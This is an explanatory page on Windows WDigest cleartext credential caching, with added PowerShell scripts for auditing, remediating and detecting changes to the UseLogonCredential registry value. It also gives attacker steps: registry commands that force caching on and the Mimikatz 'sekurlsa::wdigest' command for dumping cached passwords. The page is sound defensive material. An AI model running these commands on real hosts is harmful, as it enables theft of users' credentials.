WDigest

WDigest (Digest Authentication) is a challenge/response protocol that was primarily used in Windows Server 2003 for LDAP and web-based authentication. It relies on Hypertext Transfer Protocol (HTTP) and Simple Authentication and Security Layer (SASL) exchanges to authenticate.

Up to Windows 8 and Windows Server 2012, storing credentials in WDigest was enabled by default. This is no longer the case with Windows 10 and Windows Server 2016 and later. The reason this setting matters is that WDigest caches credentials in memory in cleartext.

It is easy to verify whether caching is enabled by querying the following registry value:

reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential
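The following PowerShell audit script is an added example and is not part of the original page. It reads the same UseLogonCredential value and interprets an absent value according to the OS generation the page describes (absent means caching is still on for Windows 8 / Server 2012 and earlier, and off for later releases). The function name Get-WDigestCachingState and the CachingEnabled/Finding fields are assumptions made for this example; the registry path and value name are those from the page.

```powershell
# Added example (not from the original page): audit the WDigest UseLogonCredential
# value on the local host and report whether cleartext credential caching is enabled.
$WDigestPath = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'

function Get-WDigestCachingState {
    param([string]$Path = $WDigestPath)

    # A missing value is a non-terminating error; with SilentlyContinue we simply get $null.
    $prop  = Get-ItemProperty -Path $Path -Name 'UseLogonCredential' -ErrorAction SilentlyContinue
    $value = if ($null -eq $prop) { $null } else { [int]$prop.UseLogonCredential }

    # NT 6.3 (Windows 8.1 / Server 2012 R2) and later treat an absent value as 0 (disabled).
    # Windows 8 / Server 2012 and earlier treat an absent value as enabled.
    # Win32_OperatingSystem is used instead of [Environment]::OSVersion because the latter
    # can report an older version for unmanifested processes.
    $osVersion         = [version](Get-CimInstance -ClassName Win32_OperatingSystem).Version
    $defaultsToCaching = $osVersion -lt [version]'6.3'

    $enabled = if ($null -eq $value) { $defaultsToCaching } else { $value -eq 1 }

    [pscustomobject]@{
        ComputerName       = $env:COMPUTERNAME
        OSVersion          = $osVersion.ToString()
        UseLogonCredential = if ($null -eq $value) { '<absent>' } else { $value }
        CachingEnabled     = $enabled          # hypothetical field name for this example
        Finding            = if ($enabled) {
            'WDigest caches cleartext credentials; set UseLogonCredential to 0 (REG_DWORD)'
        } else {
            'WDigest credential caching is disabled'
        }
    }
}

Get-WDigestCachingState | Format-List
```

Run it in an elevated PowerShell session; a CachingEnabled of True is the condition under which the Mimikatz command below would return cleartext passwords, so it is the finding to remediate.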

If caching is enabled, the cached WDigest credentials can be retrieved with a tool such as Mimikatz:

sekurlsa::wdigest

Forcing Credential Storage in WDigest

Even though storing credentials in WDigest is no longer a default setting, an attacker who has obtained access to a system can still enable it manually by modifying the following registry value (shown as a command-prompt form and a PowerShell form):

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
Set-ItemProperty -Force -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name 'UseLogonCredential' -Value 1 -Type DWord

The credentials of any user who subsequently authenticates to the system could then be dumped with a tool like Mimikatz.
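As an added example that is not part of the original page, the script below is the defender's counterpart to the commands above: it sets UseLogonCredential back to 0 as a REG_DWORD, verifies the write, and then looks for evidence that the value has been changed on the host. The function names Disable-WDigestCaching and Find-WDigestRegistryChanges are assumptions for this example. The detection part assumes Sysmon is installed with a configuration that logs registry value changes (Sysmon Event ID 13, RegistryEvent Value Set) for the WDigest key; on a host without that, the function returns nothing rather than failing.

```powershell
# Added example (not from the original page): remediate WDigest credential caching
# and look for prior modifications of the value in the Sysmon log.
$WDigestPath = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'

function Disable-WDigestCaching {
    param([string]$Path = $WDigestPath)

    if (-not (Test-Path $Path)) {
        New-Item -Path $Path -Force | Out-Null
    }

    # Explicitly type the value as DWORD; WDigest reads it as REG_DWORD.
    Set-ItemProperty -Path $Path -Name 'UseLogonCredential' -Value 0 -Type DWord -Force

    # Read back and confirm the write took effect.
    $readBack = (Get-ItemProperty -Path $Path -Name 'UseLogonCredential').UseLogonCredential
    if ([int]$readBack -ne 0) {
        throw "UseLogonCredential still reads $readBack after remediation"
    }

    # Credentials already cached in LSASS stay there until the affected logon
    # sessions end (log off or reboot); the setting only governs new logons.
    [pscustomobject]@{
        ComputerName       = $env:COMPUTERNAME
        UseLogonCredential = [int]$readBack
        Note               = 'Existing logon sessions must end before cached secrets are gone'
    }
}

function Find-WDigestRegistryChanges {
    param([int]$Days = 30)

    # Sysmon Event ID 13 = RegistryEvent (Value Set). Absent log or no events -> empty result.
    $filter = @{
        LogName   = 'Microsoft-Windows-Sysmon/Operational'
        Id        = 13
        StartTime = (Get-Date).AddDays(-$Days)
    }
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue

    foreach ($e in $events) {
        # The rendered message carries TargetObject, Details, Image and User fields.
        if ($e.Message -match 'SecurityProviders\\WDigest\\UseLogonCredential') {
            [pscustomobject]@{
                TimeCreated = $e.TimeCreated
                Details     = $e.Message
            }
        }
    }
}

Disable-WDigestCaching | Format-List
Find-WDigestRegistryChanges -Days 30 | Format-List
```

A value being set to 1 on a Windows 10 or Server 2016+ host, where the page notes it is no longer a default, is a strong signal on its own; the change can also be enforced centrally through Group Policy Preferences so that a manual re-enable is reverted at the next policy refresh.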
